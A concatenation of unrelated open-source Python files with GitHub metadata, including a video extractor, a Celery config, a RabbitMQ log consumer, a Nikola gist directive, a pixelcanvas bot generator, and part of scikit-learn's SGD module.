        title = kwargs.get('title', '')
        # Forward custom request headers when provided.  The original
        # code caught NameError here, but a missing 'headers' key raises
        # KeyError, so the no-headers fallback could never trigger.
        if 'headers' in kwargs:
            ckinfo = get_content(url, headers = kwargs['headers'])
        else:
            ckinfo = get_content(url)
        ckplayer_download_by_xml(ckinfo, output_dir, merge,
                                 info_only, title = title)
# Module-level hooks read by the extractor framework.
site_info = "CKPlayer General"
download = ckplayer_download
# CKPlayer serves single videos only; playlists are unsupported.
download_playlist = playlist_not_supported('ckplayer')
| {
"content_hash": "1d5b1c94f567e75b21905391bd53d5ae",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 104,
"avg_line_length": 36.25806451612903,
"alnum_prop": 0.5094899169632265,
"repo_name": "qzane/you-get",
"id": "9115989796b76e11990e4b3e2e94329bae854b43",
"size": "3514",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "src/you_get/extractors/ckplayer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "805"
},
{
"name": "Python",
"bytes": "408097"
},
{
"name": "Shell",
"bytes": "2649"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# Make sure Django settings are importable before Celery configures itself.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'neurovault.settings')
nvcelery = Celery('neurovault')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
nvcelery.config_from_object('django.conf:settings')
nvcelery.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
# Sentry (raven) error-reporting hooks for Celery tasks; imported here,
# after the Celery app is configured.
from raven.contrib.django.raven_compat.models import client
from raven.contrib.celery import register_signal, register_logger_signal
# register a custom filter to filter out duplicate logs
register_logger_signal(client)
# hook into the Celery error handler
register_signal(client)
| {
"content_hash": "4220ed844fdd0dcb7b531fb8d76a3f33",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 72,
"avg_line_length": 29.541666666666668,
"alnum_prop": 0.8039492242595204,
"repo_name": "NeuroVault/NeuroVault",
"id": "79431ee5f1fdbab271353d8c0f851f6f12d1f0d0",
"size": "709",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neurovault/celery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "5862"
},
{
"name": "HTML",
"bytes": "191016"
},
{
"name": "JavaScript",
"bytes": "26595"
},
{
"name": "Perl",
"bytes": "1374"
},
{
"name": "Python",
"bytes": "598856"
},
{
"name": "Shell",
"bytes": "4437"
}
],
"symlink_target": ""
} |
import octo
def do_client(taskfile, type=type, **options):
    """Thin pass-through wrapper around octo.do_client()."""
    # NOTE(review): the parameter `type` shadows the builtin, and its
    # default value is the builtin `type` itself -- presumably callers
    # always pass an explicit value; confirm before relying on the default.
    octo.do_client(taskfile=taskfile, type=type, **options)
"content_hash": "3ee9614602b5b2255426ccb87472357b",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 60,
"avg_line_length": 24.2,
"alnum_prop": 0.71900826446281,
"repo_name": "zaqwes8811/micro-apps",
"id": "355af8fae9d18be91f9e670b7429b6b19811846b",
"size": "138",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "buffer/shard-cpp-test/shard-node/_code/octo_client_adapter.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ActionScript",
"bytes": "309556"
},
{
"name": "Assembly",
"bytes": "570069"
},
{
"name": "Batchfile",
"bytes": "56007"
},
{
"name": "C",
"bytes": "53062"
},
{
"name": "C#",
"bytes": "32208"
},
{
"name": "C++",
"bytes": "1108629"
},
{
"name": "CMake",
"bytes": "23718"
},
{
"name": "CSS",
"bytes": "186903"
},
{
"name": "Cuda",
"bytes": "9680"
},
{
"name": "Dart",
"bytes": "1158"
},
{
"name": "Dockerfile",
"bytes": "20181"
},
{
"name": "Go",
"bytes": "6640"
},
{
"name": "HTML",
"bytes": "2215958"
},
{
"name": "Haskell",
"bytes": "383"
},
{
"name": "Java",
"bytes": "140401"
},
{
"name": "JavaScript",
"bytes": "714877"
},
{
"name": "Jupyter Notebook",
"bytes": "25399728"
},
{
"name": "Kotlin",
"bytes": "713"
},
{
"name": "Lua",
"bytes": "2253"
},
{
"name": "MATLAB",
"bytes": "103"
},
{
"name": "Makefile",
"bytes": "33566"
},
{
"name": "Mako",
"bytes": "824"
},
{
"name": "NSIS",
"bytes": "7481"
},
{
"name": "PHP",
"bytes": "59915"
},
{
"name": "Pascal",
"bytes": "2492"
},
{
"name": "Pawn",
"bytes": "3337"
},
{
"name": "Python",
"bytes": "1836093"
},
{
"name": "QML",
"bytes": "58517"
},
{
"name": "QMake",
"bytes": "4042"
},
{
"name": "R",
"bytes": "13753"
},
{
"name": "Ruby",
"bytes": "522"
},
{
"name": "Rust",
"bytes": "210"
},
{
"name": "Scheme",
"bytes": "113588"
},
{
"name": "Scilab",
"bytes": "1348"
},
{
"name": "Shell",
"bytes": "16112"
},
{
"name": "SourcePawn",
"bytes": "3316"
},
{
"name": "VBScript",
"bytes": "9376"
},
{
"name": "XSLT",
"bytes": "24926"
}
],
"symlink_target": ""
} |
import pika
import sys, getopt
def main(argv):
    """Consume and print messages from a RabbitMQ queue, forever.

    Expects exactly two options: -s/--server <host> and -q/--queue <name>.
    Python 2 only (print statements, legacy pika basic_consume signature).
    """
    server = ''
    queueName = ''
    # argv excludes the program name, but the full command line
    # "log.py -s host -q queue" (5 entries) is validated via sys.argv.
    if len(sys.argv) != 5:
        print 'log.py -s <server> -q <queue>'
        sys.exit(2)
    try:
        # NOTE(review): "hs::q:" carries a stray second colon after 's';
        # "hs:q:" was presumably intended -- confirm, though Python's
        # getopt tolerates it for these inputs.
        opts, args = getopt.getopt(argv,"hs::q:",["server=","queue="])
    except getopt.GetoptError:
        print 'log.py -s <server> -q <queue>'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print 'log.py -s <server> -q <queue>'
            sys.exit()
        elif opt in ("-s", "--server"):
            server = arg
        elif opt in ("-q", "--queue"):
            queueName = arg
    # Blocking connection; declare the queue so consuming cannot fail on
    # a not-yet-existing queue.
    connection = pika.BlockingConnection(pika.ConnectionParameters(host=server))
    channel = connection.channel()
    channel.queue_declare(queue=queueName)
    print ' Waiting for log messages. To exit press CTRL+C'
    def callback(ch, method, properties, body):
        # Print each message body; no_ack=True below means the broker is
        # never sent an explicit acknowledgement.
        print body
    channel.basic_consume(callback, queue=queueName, no_ack=True)
    channel.start_consuming()
if __name__ == "__main__":
    main(sys.argv[1:])
| {
"content_hash": "3afdb20e99ca8ad16d93e0966e53d7eb",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 79,
"avg_line_length": 26.36842105263158,
"alnum_prop": 0.591816367265469,
"repo_name": "HowardLander/DataBridge",
"id": "8eeb358ec6d79b0d811f4fda463010d895f9ca69",
"size": "1024",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/python/log.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2842"
},
{
"name": "HTML",
"bytes": "4259"
},
{
"name": "Java",
"bytes": "822249"
},
{
"name": "JavaScript",
"bytes": "31621"
},
{
"name": "Shell",
"bytes": "23977"
}
],
"symlink_target": ""
} |
from docutils.parsers.rst import Directive, directives
from docutils import nodes
try:
import requests
except ImportError:
requests = None # NOQA
from nikola.plugin_categories import RestExtension
from nikola import utils
class Plugin(RestExtension):
    """Nikola reST extension that registers the `gist` directive."""
    name = "rest_gist"
    def set_site(self, site):
        self.site = site
        directives.register_directive('gist', GitHubGist)
        return super(Plugin, self).set_site(site)
class GitHubGist(Directive):
    """ Embed GitHub Gist.
    Usage:
    .. gist:: GIST_ID
    """
    required_arguments = 1
    optional_arguments = 1
    # Optional ":file: NAME" option selects one file of a multi-file gist.
    option_spec = {'file': directives.unchanged}
    final_argument_whitespace = True
    has_content = False
    def get_raw_gist_with_filename(self, gistID, filename):
        """Fetch the raw text of one file of the gist."""
        url = '/'.join(("https://raw.github.com/gist", gistID, filename))
        return requests.get(url).text
    def get_raw_gist(self, gistID):
        """Fetch the raw text of the whole gist."""
        url = "https://raw.github.com/gist/{0}".format(gistID)
        return requests.get(url).text
    def run(self):
        """Return the docutils nodes embedding the gist.

        Emits the JS embed <script> plus a <noscript> literal block with
        the raw gist text so content survives without JavaScript.
        """
        if requests is None:
            # requests is optional (see the guarded import at the top of
            # the module); degrade to an inline error instead of failing
            # the whole build.
            msg = (
                'ERROR:'
                'To use the gist directive, you need to install the '
                '"requests" package.\n'
            )
            utils.show_msg(msg)
            return [nodes.raw('', '<div class="text-error">{0}</div>'.format(msg), format='html')]
        gistID = self.arguments[0].strip()
        embedHTML = ""
        rawGist = ""
        if 'file' in self.options:
            filename = self.options['file']
            rawGist = (self.get_raw_gist_with_filename(gistID, filename))
            embedHTML = ('<script src="https://gist.github.com/{0}.js'
                         '?file={1}"></script>').format(gistID, filename)
        else:
            rawGist = (self.get_raw_gist(gistID))
            embedHTML = ('<script src="https://gist.github.com/{0}.js">'
                         '</script>').format(gistID)
        return [nodes.raw('', embedHTML, format='html'),
                nodes.raw('', '<noscript>', format='html'),
                nodes.literal_block('', rawGist),
                nodes.raw('', '</noscript>', format='html')]
| {
"content_hash": "a3aa1c59ca42767861ea4a88d118abe8",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 98,
"avg_line_length": 30.887323943661972,
"alnum_prop": 0.5649794801641587,
"repo_name": "damianavila/nikola",
"id": "f47edad2b73c50cddcbd3465d0bdd8b65e359407",
"size": "2282",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nikola/plugins/compile/rest/gist.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "315959"
},
{
"name": "JavaScript",
"bytes": "147595"
},
{
"name": "Python",
"bytes": "505175"
},
{
"name": "Shell",
"bytes": "663"
}
],
"symlink_target": ""
} |
"""Error controller"""
from tg import request, expose
__all__ = ['ErrorController']
class ErrorController(object):
    """
    Generates error documents as and when they are required.
    The ErrorDocuments middleware forwards to ErrorController when error
    related status codes are returned from the application.
    This behaviour can be altered by changing the parameters to the
    ErrorDocuments middleware in your config/middleware.py file.
    """
    @expose('tg2app.templates.error')
    def document(self, *args, **kwargs):
        """Render the error document"""
        # The middleware stashes the original response in the WSGI
        # environ; status/message may also be overridden via request
        # params.
        # NOTE(review): resp is None when this action is reached outside
        # the middleware, making resp.status_int fail -- confirm intended.
        resp = request.environ.get('pylons.original_response')
        default_message = ("<p>We're sorry but we weren't able to process "
                           " this request.</p>")
        values = dict(prefix=request.environ.get('SCRIPT_NAME', ''),
                      code=request.params.get('code', resp.status_int),
                      message=request.params.get('message', default_message))
        return values
| {
"content_hash": "34088d7603ad6cd8855434f60ddbf137",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 77,
"avg_line_length": 35.10344827586207,
"alnum_prop": 0.6444007858546169,
"repo_name": "ralphbean/moksha",
"id": "3b2c3589d3e9980b9d774c646102c20eaa0847ec",
"size": "1042",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "moksha/tests/quickstarts/tg2app/tg2app/controllers/error.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "1249457"
},
{
"name": "Python",
"bytes": "731300"
},
{
"name": "Shell",
"bytes": "1776"
}
],
"symlink_target": ""
} |
from __future__ import print_function, division
from string import Template
import argparse
import json
import math
import sys
import re
class Point:
    """A single pixel (canvas position plus palette index) to paint."""
    def __init__(self, x, y, color=4):
        self.x, self.y, self.color = x, y, color
    def __str__(self):
        # Rendered as a JavaScript object literal for the bot template.
        return '{{x:{0}, y:{1}, color:{2}}}'.format(self.x, self.y, self.color)
# RGB palette of the 16 colors available on pixelcanvas.io; a Point's
# `color` attribute indexes into this list.
# NOTE(review): ordering assumed to match the site's color IDs -- confirm.
COLORS = [
    (255, 255, 255),
    (228, 228, 228),
    (136, 136, 136),
    (34, 34, 34),
    (255, 167, 209),
    (229, 0, 0),
    (229, 149, 0),
    (160, 106, 66),
    (229, 217, 0),
    (148, 224, 68),
    (2, 190, 1),
    (0, 211, 221),
    (0, 131, 199),
    (0, 0, 234),
    (207, 110, 228),
    (130, 0, 128),
]
def points_from_text(file_path):
    """Parse a text file into a list of points.

    Each digit character becomes a Point whose color is the digit's
    value; column and row supply the x/y coordinates.  Every other
    character (spaces, letters, newlines) is ignored.
    """
    with open(file_path, 'r') as f:
        lines = f.readlines()
    points = []
    for row, line in enumerate(lines):
        for col, character in enumerate(line):
            try:
                color = int(character)
            except ValueError:
                # Not a digit -- the old bare `except: pass` also hid
                # unrelated errors; only non-digit cells are skipped now.
                continue
            points.append(Point(col, row, color))
    return points
def points_from_image(image_path):
    """Parse an image into a list of points to paint on pixelcanvas.io.

    Fully transparent pixels are skipped; every other pixel is mapped to
    the nearest entry of the 16-color palette (COLORS).
    """
    from PIL import Image
    image = Image.open(image_path)
    # Normalise to RGBA so the alpha test below works for images saved
    # without an alpha channel (plain RGB, palette mode, ...), which
    # previously crashed on pixel[3].
    if image.mode != 'RGBA':
        image = image.convert('RGBA')
    image_data = image.getdata()
    print('Producing bot from image \'{}\' with resolution {}x{}.'.format(image_path, image.width, image.height), file=sys.stderr)
    # Iterate through each pixel, build an equivalent point.
    points = []
    for y in range(image.height):
        for x in range(image.width):
            # All pixels live in one flat array; compute the index.
            pixel = image_data[x + y*image.width]
            # Only use this pixel if it is not fully transparent.
            if pixel[3] == 0:
                continue
            # Treat RGB as a 3D space and pick the palette entry closest
            # to the pixel.  Comparing *squared* distances yields the
            # same winner as the original sqrt-based euclidean distance
            # (sqrt is monotonic) while avoiding a sqrt per entry.
            best_color = 0
            minimum_distance = 256**3
            for color_index, color in enumerate(COLORS):
                distance = ((pixel[0] - color[0])**2 +
                            (pixel[1] - color[1])**2 +
                            (pixel[2] - color[2])**2)
                if distance < minimum_distance:
                    minimum_distance = distance
                    best_color = color_index
            points.append(Point(x, y, best_color))
    return points
def produce_bot(points, ox, oy, fingerprint, save_path, template_path=None):
    """Use the bot template to produce a bot ready for use.

    points        -- iterable of Point-like objects (anything whose str()
                     yields a JS object literal) to be painted
    ox, oy        -- canvas offset where the drawing is anchored
    fingerprint   -- the user's fingerprint
    save_path     -- where the generated JavaScript bot is written
    template_path -- bot template file; when None, falls back to the
                     module-level CLI argument (args.bot_template) for
                     backward compatibility with the original behaviour,
                     which read that global directly.
    """
    if template_path is None:
        # Backward-compatible fallback to the argparse namespace that
        # __main__ publishes at module level.
        template_path = args.bot_template
    # Prepare template.
    with open(template_path) as f:
        template = Template(f.read())
    print('Using template from `{}`.'.format(template_path), file=sys.stderr)
    # Join points on a single string (linear join instead of the old
    # quadratic `+=` loop).
    points_string = ''.join(str(point) + ', ' for point in points)
    # Produce and save the bot.
    bot_content = template.substitute(
        points=points_string,
        ox=ox, oy=oy,
        fingerprint=fingerprint)
    with open(save_path, 'w') as f:
        f.write(bot_content)
def main():
    """Convert the input file into points and emit the bot script.

    Reads all settings from the module-level `args` namespace created by
    the __main__ block.
    """
    print('Parsing file...', file=sys.stderr)
    # Dispatch on file extension: text grids vs raster images.
    if args.file_path.endswith('.txt'):
        points = points_from_text(args.file_path)
    elif re.match(r'.*\.(png|bmp|jpg|jpeg|gif)$', args.file_path):
        points = points_from_image(args.file_path)
    else:
        print('Can\'t produce any bot from \'{}\'.'.format(args.file_path), file=sys.stderr)
        exit(1)
    print('Number of points produced: {}.'.format(len(points)), file=sys.stderr)
    # Decide where to save the bot to.
    if args.save_to:
        bot_save_path = args.save_to
    else:
        # Default: input filename with its extension swapped for .js.
        bot_save_path = re.sub(r'\.\w+$', '.js', args.file_path)
    # Create and save the bot.
    print('Saving bot to \'{}\'...'.format(bot_save_path), file=sys.stderr)
    produce_bot(points, args.x_offset, args.y_offset, args.fingerprint, bot_save_path)
    print('All done.', file=sys.stderr)
if __name__ == '__main__':
    # Command-line interface; the parsed namespace is intentionally left
    # module-global (`args`) so helper functions can read it.
    parser = argparse.ArgumentParser(description='')
    parser.add_argument('file_path', help='The file indicating what should be built by the robot. It can be an image or a text file.')
    parser.add_argument('x_offset', type=int, help='X coordinate for where in the canvas the drawing should be painted.')
    parser.add_argument('y_offset', type=int, help='Y coordinate for where in the canvas the drawing should be painted.')
    parser.add_argument('fingerprint', help='Your fingerprint.')
    parser.add_argument('-t', '--bot-template', default='template/pixelbot-fetch-template.js', help='Location do the template which will produce the bot.')
    parser.add_argument('-s', '--save-to', help='Where the bot script should be saved to. Defaults to <file_path> terminating with `.js`.')
    args = parser.parse_args()
    main()
| {
"content_hash": "9b66d86c2e9c28dc803172760bfef3c1",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 155,
"avg_line_length": 36.67391304347826,
"alnum_prop": 0.5900019758940921,
"repo_name": "possatti/pixelbot",
"id": "bc3c350d113a0a38f8d256e2d0ee11e3e69195e2",
"size": "5108",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "botfactory.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "4466"
},
{
"name": "Python",
"bytes": "7403"
}
],
"symlink_target": ""
} |
from scrapy import Item, Field
class PcrawlerItem(Item):
    # Scrapy item holding one scraped place/venue record.
    # NOTE(review): field semantics inferred from names only; the spider
    # that populates them defines the authoritative meaning.
    name = Field()
    street = Field()
    district = Field()
    city = Field()
    open_time = Field()
    address = Field()
    close_time = Field()
    open_close = Field()
    price = Field()
    ratings = Field()
    lat = Field()  # latitude
    lon = Field()  # longitude
| {
"content_hash": "6719bf69334db0ca63ead30e0821985f",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 30,
"avg_line_length": 19.6875,
"alnum_prop": 0.5682539682539682,
"repo_name": "fmlvn/anphode",
"id": "68366db7bb7e8f8f7dc2df602a893ba3d6fb30ba",
"size": "467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pcrawler/pcrawler/items.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "211"
},
{
"name": "Python",
"bytes": "11019"
}
],
"symlink_target": ""
} |
"""Classification and regression using Stochastic Gradient Descent (SGD)."""
import numpy as np
import warnings
from abc import ABCMeta, abstractmethod
from ..externals.joblib import Parallel, delayed
from .base import LinearClassifierMixin, SparseCoefMixin
from .base import make_dataset
from ..base import BaseEstimator, RegressorMixin
from ..utils import check_array, check_random_state, check_X_y
from ..utils.extmath import safe_sparse_dot
from ..utils.multiclass import _check_partial_fit_first_call
from ..utils.validation import check_is_fitted
from ..exceptions import ConvergenceWarning
from ..externals import six
from .sgd_fast import plain_sgd, average_sgd
from ..utils import compute_class_weight
from ..utils import deprecated
from .sgd_fast import Hinge
from .sgd_fast import SquaredHinge
from .sgd_fast import Log
from .sgd_fast import ModifiedHuber
from .sgd_fast import SquaredLoss
from .sgd_fast import Huber
from .sgd_fast import EpsilonInsensitive
from .sgd_fast import SquaredEpsilonInsensitive
# Mapping from user-facing names to the integer codes passed to the
# sgd_fast implementations (plain_sgd / average_sgd).
LEARNING_RATE_TYPES = {"constant": 1, "optimal": 2, "invscaling": 3,
                       "pa1": 4, "pa2": 5}
PENALTY_TYPES = {"none": 0, "l2": 2, "l1": 1, "elasticnet": 3}
DEFAULT_EPSILON = 0.1
# Default value of ``epsilon`` parameter.
class BaseSGD(six.with_metaclass(ABCMeta, BaseEstimator, SparseCoefMixin)):
"""Base class for SGD classification and regression."""
    def __init__(self, loss, penalty='l2', alpha=0.0001, C=1.0,
                 l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
                 shuffle=True, verbose=0, epsilon=0.1, random_state=None,
                 learning_rate="optimal", eta0=0.0, power_t=0.5,
                 warm_start=False, average=False, n_iter=None):
        # Store all hyper-parameters verbatim (scikit-learn convention:
        # __init__ only records parameters so get_params/set_params
        # round-trip cleanly; no derived attributes are computed here).
        self.loss = loss
        self.penalty = penalty
        self.learning_rate = learning_rate
        self.epsilon = epsilon
        self.alpha = alpha
        self.C = C
        self.l1_ratio = l1_ratio
        self.fit_intercept = fit_intercept
        self.shuffle = shuffle
        self.random_state = random_state
        self.verbose = verbose
        self.eta0 = eta0
        self.power_t = power_t
        self.warm_start = warm_start
        self.average = average
        self.n_iter = n_iter
        self.max_iter = max_iter
        self.tol = tol
        # current tests expect init to do parameter validation
        # but we are not allowed to set attributes
        self._validate_params(set_max_iter=False)
    def set_params(self, *args, **kwargs):
        """Set estimator parameters and re-validate them."""
        super(BaseSGD, self).set_params(*args, **kwargs)
        self._validate_params(set_max_iter=False)
        return self
    @abstractmethod
    def fit(self, X, y):
        """Fit model."""
        # Implemented by the concrete classifier/regressor subclasses.
def _validate_params(self, set_max_iter=True):
"""Validate input params. """
if not isinstance(self.shuffle, bool):
raise ValueError("shuffle must be either True or False")
if self.max_iter is not None and self.max_iter <= 0:
raise ValueError("max_iter must be > zero. Got %f" % self.max_iter)
if not (0.0 <= self.l1_ratio <= 1.0):
raise ValueError("l1_ratio must be in [0, 1]")
if self.alpha < 0.0:
raise ValueError("alpha must be >= 0")
if self.learning_rate in ("constant", "invscaling"):
if self.eta0 <= 0.0:
raise ValueError("eta0 must be > 0")
if self.learning_rate == "optimal" and self.alpha == 0:
raise ValueError("alpha must be > 0 since "
"learning_rate is 'optimal'. alpha is used "
"to compute the optimal learning rate.")
# raises ValueError if not registered
self._get_penalty_type(self.penalty)
self._get_learning_rate_type(self.learning_rate)
if self.loss not in self.loss_functions:
raise ValueError("The loss %s is not supported. " % self.loss)
if not set_max_iter:
return
# n_iter deprecation, set self._max_iter, self._tol
self._tol = self.tol
if self.n_iter is not None:
warnings.warn("n_iter parameter is deprecated in 0.19 and will be"
" removed in 0.21. Use max_iter and tol instead.",
DeprecationWarning)
# Same behavior as before 0.19
max_iter = self.n_iter
self._tol = None
elif self.tol is None and self.max_iter is None:
warnings.warn(
"max_iter and tol parameters have been added in %s in 0.19. If"
" both are left unset, they default to max_iter=5 and tol=None"
". If tol is not None, max_iter defaults to max_iter=1000. "
"From 0.21, default max_iter will be 1000, "
"and default tol will be 1e-3." % type(self), FutureWarning)
# Before 0.19, default was n_iter=5
max_iter = 5
else:
max_iter = self.max_iter if self.max_iter is not None else 1000
self._max_iter = max_iter
def _get_loss_function(self, loss):
"""Get concrete ``LossFunction`` object for str ``loss``. """
try:
loss_ = self.loss_functions[loss]
loss_class, args = loss_[0], loss_[1:]
if loss in ('huber', 'epsilon_insensitive',
'squared_epsilon_insensitive'):
args = (self.epsilon, )
return loss_class(*args)
except KeyError:
raise ValueError("The loss %s is not supported. " % loss)
def _get_learning_rate_type(self, learning_rate):
try:
return LEARNING_RATE_TYPES[learning_rate]
except KeyError:
raise ValueError("learning rate %s "
"is not supported. " % learning_rate)
def _get_penalty_type(self, penalty):
penalty = str(penalty).lower()
try:
return PENALTY_TYPES[penalty]
except KeyError:
raise ValueError("Penalty %s is not supported. " % penalty)
def _validate_sample_weight(self, sample_weight, n_samples):
"""Set the sample weight array."""
if sample_weight is None:
# uniform sample weights
sample_weight = np.ones(n_samples, dtype=np.float64, order='C')
else:
# user-provided array
sample_weight = np.asarray(sample_weight, dtype=np.float64,
order="C")
if sample_weight.shape[0] != n_samples:
raise ValueError("Shapes of X and sample_weight do not match.")
return sample_weight
def _allocate_parameter_mem(self, n_classes, n_features, coef_init=None,
intercept_init=None):
"""Allocate mem for parameters; initialize if provided."""
if n_classes > 2:
# allocate coef_ for multi-class
if coef_init is not None:
coef_init = np.asarray(coef_init, order="C")
if coef_init.shape != (n_classes, n_features):
raise ValueError("Provided ``coef_`` does not match "
"dataset. ")
self.coef_ = coef_init
else:
self.coef_ = np.zeros((n_classes, n_features),
dtype=np.float64, order="C")
# allocate intercept_ for multi-class
if intercept_init is not None:
intercept_init = np.asarray(intercept_init, order="C")
if intercept_init.shape != (n_classes, ):
raise ValueError("Provided intercept_init "
"does not match dataset.")
self.intercept_ = intercept_init
else:
self.intercept_ = np.zeros(n_classes, dtype=np.float64,
order="C")
else:
# allocate coef_ for binary problem
if coef_init is not None:
coef_init = np.asarray(coef_init, dtype=np.float64,
order="C")
coef_init = coef_init.ravel()
if coef_init.shape != (n_features,):
raise ValueError("Provided coef_init does not "
"match dataset.")
self.coef_ = coef_init
else:
self.coef_ = np.zeros(n_features,
dtype=np.float64,
order="C")
# allocate intercept_ for binary problem
if intercept_init is not None:
intercept_init = np.asarray(intercept_init, dtype=np.float64)
if intercept_init.shape != (1,) and intercept_init.shape != ():
raise ValueError("Provided intercept_init "
"does not match dataset.")
self.intercept_ = intercept_init.reshape(1,)
else:
self.intercept_ = np.zeros(1, dtype=np.float64, order="C")
# initialize average parameters
if self.average > 0:
self.standard_coef_ = self.coef_
self.standard_intercept_ = self.intercept_
self.average_coef_ = np.zeros(self.coef_.shape,
dtype=np.float64,
order="C")
self.average_intercept_ = np.zeros(self.standard_intercept_.shape,
dtype=np.float64,
order="C")
def _prepare_fit_binary(est, y, i):
    """Set up targets and parameter views for one one-vs-all fit.

    The i'th class of ``est`` is treated as the positive class (+1) and
    every other class as negative (-1).

    Returns ``(y_i, coef, intercept, average_coef, average_intercept)``
    where ``coef``/``intercept`` (and their averaged counterparts when
    ``est.average`` is enabled) refer to the estimator's parameter
    storage for the binary subproblem.
    """
    # +1.0 for samples of class i, -1.0 for everything else, as a
    # C-contiguous float64 array.
    y_i = np.where(np.asarray(y) == est.classes_[i], 1.0, -1.0)
    y_i = np.ascontiguousarray(y_i, dtype=np.float64)
    average_coef = None
    average_intercept = 0
    is_binary = (len(est.classes_) == 2)
    averaging = bool(est.average)
    if is_binary:
        # Binary problem: the parameters are stored as a single row.
        source_coef = est.standard_coef_ if averaging else est.coef_
        source_intercept = (est.standard_intercept_ if averaging
                            else est.intercept_)
        coef = source_coef.ravel()
        intercept = source_intercept[0]
        if averaging:
            average_coef = est.average_coef_.ravel()
            average_intercept = est.average_intercept_[0]
    else:
        # Multiclass: pick out the i'th row of the parameter matrices.
        if averaging:
            coef = est.standard_coef_[i]
            intercept = est.standard_intercept_[i]
            average_coef = est.average_coef_[i]
            average_intercept = est.average_intercept_[i]
        else:
            coef = est.coef_[i]
            intercept = est.intercept_[i]
    return y_i, coef, intercept, average_coef, average_intercept
def fit_binary(est, i, X, y, alpha, C, learning_rate, max_iter,
               pos_weight, neg_weight, sample_weight):
    """Fit a single binary classifier.

    The i'th class is considered the "positive" class.

    Parameters
    ----------
    est : estimator carrying the SGD state (coef_, intercept_, classes_, ...)
    i : int
        Index into ``est.classes_`` of the positive class.
    X, y : training data and original (multi-class) labels.
    alpha : float
        Regularization strength.
    C : float
        Maximum step size for passive-aggressive updates.
    learning_rate : string
        Name of the learning-rate schedule.
    max_iter : int
        Maximum number of epochs.
    pos_weight, neg_weight : float
        Class weights of the positive and negative class.
    sample_weight : ndarray
        Per-sample weights.

    Returns
    -------
    coef, intercept, n_iter_ : the fitted weights, the fitted intercept and
        the number of epochs actually run.
    """
    # if average is not true, average_coef, and average_intercept will be
    # unused
    y_i, coef, intercept, average_coef, average_intercept = \
        _prepare_fit_binary(est, y, i)
    assert y_i.shape[0] == y.shape[0] == sample_weight.shape[0]
    dataset, intercept_decay = make_dataset(X, y_i, sample_weight)
    penalty_type = est._get_penalty_type(est.penalty)
    learning_rate_type = est._get_learning_rate_type(learning_rate)
    # XXX should have random_state_!
    random_state = check_random_state(est.random_state)
    # numpy mtrand expects a C long which is a signed 32 bit integer under
    # Windows
    seed = random_state.randint(0, np.iinfo(np.int32).max)
    # Use the validated ``_tol`` (set by _validate_params) rather than the
    # raw ``tol`` parameter, consistent with ``BaseSGDRegressor._fit_regressor``.
    # The deprecated ``n_iter`` path sets ``_tol`` to None specifically to
    # reproduce pre-0.19 behavior (no tol-based early stopping); reading
    # ``est.tol`` directly would silently re-enable the stopping criterion.
    tol = est._tol if est._tol is not None else -np.inf
    if not est.average:
        return plain_sgd(coef, intercept, est.loss_function_,
                         penalty_type, alpha, C, est.l1_ratio,
                         dataset, max_iter, tol, int(est.fit_intercept),
                         int(est.verbose), int(est.shuffle), seed,
                         pos_weight, neg_weight,
                         learning_rate_type, est.eta0,
                         est.power_t, est.t_, intercept_decay)
    else:
        standard_coef, standard_intercept, average_coef, average_intercept, \
            n_iter_ = average_sgd(coef, intercept, average_coef,
                                  average_intercept, est.loss_function_,
                                  penalty_type, alpha, C, est.l1_ratio,
                                  dataset, max_iter, tol,
                                  int(est.fit_intercept), int(est.verbose),
                                  int(est.shuffle), seed, pos_weight,
                                  neg_weight, learning_rate_type, est.eta0,
                                  est.power_t, est.t_, intercept_decay,
                                  est.average)
        # Write the averaged intercept back onto the estimator; the averaged
        # coefficients live in the array _prepare_fit_binary handed out.
        if len(est.classes_) == 2:
            est.average_intercept_[0] = average_intercept
        else:
            est.average_intercept_[i] = average_intercept
        return standard_coef, standard_intercept, n_iter_
class BaseSGDClassifier(six.with_metaclass(ABCMeta, BaseSGD,
                                           LinearClassifierMixin)):
    """Shared implementation for SGD-trained linear classifiers.

    Concrete subclasses only provide the public constructor; all fitting
    logic (binary and one-vs-all multiclass) lives here.
    """
    # Mapping from loss name to (LossFunction class, *constructor args),
    # consumed by BaseSGD._get_loss_function.
    loss_functions = {
        "hinge": (Hinge, 1.0),
        "squared_hinge": (SquaredHinge, 1.0),
        "perceptron": (Hinge, 0.0),
        "log": (Log, ),
        "modified_huber": (ModifiedHuber, ),
        "squared_loss": (SquaredLoss, ),
        "huber": (Huber, DEFAULT_EPSILON),
        "epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
